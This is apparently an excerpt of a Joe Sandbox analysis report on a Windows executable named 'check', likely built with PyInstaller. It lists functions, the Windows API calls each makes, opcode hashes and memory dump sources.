                                                                                                                                                                                                                                          • Instruction ID: dbf2165508bec93022408576bb2ce849e5e57425963a01dc0b1fc0921d9529a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC1732291CE8692E660AF1598C02BDEB50FB81BA0FD54171DA4D07791FEBCE84DC729
                                                                                                                                                                                                                                          Function 00007FF7124F8570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 995526605-0
                                                                                                                                                                                                                                          • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                          • Instruction ID: 97166c388e4c5c6ab61f7fe53fbae8dc5d5c2b8cfde78f4d44e46f163325d2f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2521F431B0CA4242FB50AB59B58423AE7A0FBC5BF0F900235EA6D477D4EEACD859C710
                                                                                                                                                                                                                                          Function 00007FF7124F90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: GetCurrentProcess.KERNEL32 ref: 00007FF7124F8590
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: OpenProcessToken.ADVAPI32 ref: 00007FF7124F85A3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: GetTokenInformation.KERNELBASE ref: 00007FF7124F85C8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: GetLastError.KERNEL32 ref: 00007FF7124F85D2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: GetTokenInformation.KERNELBASE ref: 00007FF7124F8612
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7124F862E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: CloseHandle.KERNELBASE ref: 00007FF7124F8646
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF7124F3C55), ref: 00007FF7124F916C
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF7124F3C55), ref: 00007FF7124F9175
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                          • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                          • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                          • Instruction ID: 3f049ae6affc9ec2a5b36b1cabb6348e1b8bef0cc6158d5774a3500f8ee0accb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6213935A08E4282F710BB14E9552EAB261EBC87A0FC44435EE4D43796DFBCE819C7A0
                                                                                                                                                                                                                                          Function 00007FF7124F7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(00000000,?,00007FF7124F352C,?,00000000,00007FF7124F3F23), ref: 00007FF7124F7F32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                                                                          • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                          • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                          • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                          • Instruction ID: 23bc648f564481fa4cb09736bd78cdbf2bd23e8f22d0d805f9d8ee1547dcbdf5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9131B821719EC145EB21EB15E4507AAA354EBC4BF0F840231EE6D477C5EF6CDA19C710
                                                                                                                                                                                                                                          Function 00007FF71250CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71250CF4B), ref: 00007FF71250D07C
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71250CF4B), ref: 00007FF71250D107
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                                          • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                          • Instruction ID: c30fce92fa661bbfdc522545bb8d72c2ed63180d8c25c96b03adf04e65997356
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A910A32F19E5185F760AF6598C027DABA0FB487A4F944175DE0E53684EFBCD84AC324
                                                                                                                                                                                                                                          Function 00007FF71250F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                          • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                          • Instruction ID: c2b17bb5ae86e995ec78ecd07b21b463e77b5dda114a34ace26746e77f99f1f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62513772F04A118BEB14EF649DD56BCB761AB44378F900275DD1D52AE4EF7CA40ACB10
                                                                                                                                                                                                                                          Function 00007FF71250577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                                          • Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                          • Instruction ID: 1e7db5f61cb0e05bdcc4bc5e04c7648356e968c3b79c544958a504fffddfd413
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87519222E04A418AFB10EF71E8903BDB7A5BF48B68FA44434DE0D57685EF78D449C328
                                                                                                                                                                                                                                          Function 00007FF712505628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                          • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                          • Instruction ID: 535e2e6bbd25dab220523e110017ed2f99b14c9072e0b083cbbc7d43a65f34d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E41B822D18B8183E710AF60A994379B760FB943B8F509375E65C03AD1EFBCA5E4C714
                                                                                                                                                                                                                                          Function 00007FF7124FCC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                          • Instruction ID: c6cf576af74d3300f5252855043800dd550d478268fcdb9853ee1283962652e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1313822E48D4241FB14FB28D8922B996919F857A4FC45074DD4E4B2E7EEECAC1CC338
                                                                                                                                                                                                                                          Function 00007FF712509A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                          • Instruction ID: 9d5fcf6bb2f8f947a6db21943c3cd49caa3314030af7a7230235a9aa583423ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98D09210F18F4642EB183F726CD91B992656F88B21F9524B8C81B06397FEACA84DC324
                                                                                                                                                                                                                                          Function 00007FF71250013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                          • Instruction ID: cc0aba2a921cc5363ef9383b8771fdc1635d23ce39f21b385dd2b35012ec05ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60512B21B1DE4286E725BE259C807BAE691AF44BB4F984770DD6C037C5EEBCD409C724
                                                                                                                                                                                                                                          Function 00007FF71250C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                          • Instruction ID: 2c7d5046d05022def5d94b5055df8b2c6afc113d58a5daf93a83c5cabf27c145
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF11E221708F8181DA20AF25A894069E361AB56FF0F940371EEBD0B7D8EEBCD419C744
                                                                                                                                                                                                                                          Function 00007FF712505924 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF712505839), ref: 00007FF712505957
                                                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF712505839), ref: 00007FF71250596D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1707611234-0
                                                                                                                                                                                                                                          • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                          • Instruction ID: a7f74d5524c1a063d039e9b275c5ed4071e7f1ecbdf6f7d44624b18811b8bfe6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C119431A0CA1282EB54AF14B89143AF760FB84775F900675FA9D819D4FFACD418DB20
                                                                                                                                                                                                                                          Function 00007FF71250A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                          • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                          • Instruction ID: 9d2e8b55bc438c732fd35173ad44335309e008684b1b395ae67d048a08d24513
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E04F50F19A0242FE157FB158C51399650AF88B61FC405B0D90D46292FDAC6849C234
